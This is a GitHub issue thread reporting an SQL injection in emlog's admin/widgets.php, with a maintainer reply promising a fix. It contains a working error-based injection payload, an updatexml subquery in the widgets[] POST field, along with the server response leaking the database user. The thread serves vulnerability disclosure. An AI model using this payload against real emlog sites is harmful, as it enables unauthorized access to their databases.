### ISSUE TITLE
/emlog/src/admin/widgets.php has SQL injection vulnerability

### ISSUE THREAD

**Issue by weidutech** [emlog/emlog#106]
POST /emlog/src/admin/widgets.php?action=compages HTTP/1.1
Host: 192.168.3.77
Content-Length: 122
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.3.77
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.77/emlog/src/admin/widgets.php?activated=true&wg=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

widgets%5B%5D=search&widgets%5B%5D=link&widgets%5B%5D=archive' and updatexml(0x3a,concat(1,(select user())),1)and'&wgnum=1

**Comment by weidutech** [comment]
response：
<body>
<div class="main">
<p>SQL语句执行错误：UPDATE emlog_options SET option_value='a:3:{i:0;s:6:"search";i:1;s:4:"link";i:2;s:60:"archive' and updatexml(0x3a,concat(1,(select user())),1)and'";}' where option_name='widgets1' <br />XPATH syntax error: 'root@localhost'</p><p><a href="javascript:history.back(-1);">&laquo;点击返回</a></p></div>
</body>

**Comment by emlog** [comment]
thx i will fix it.
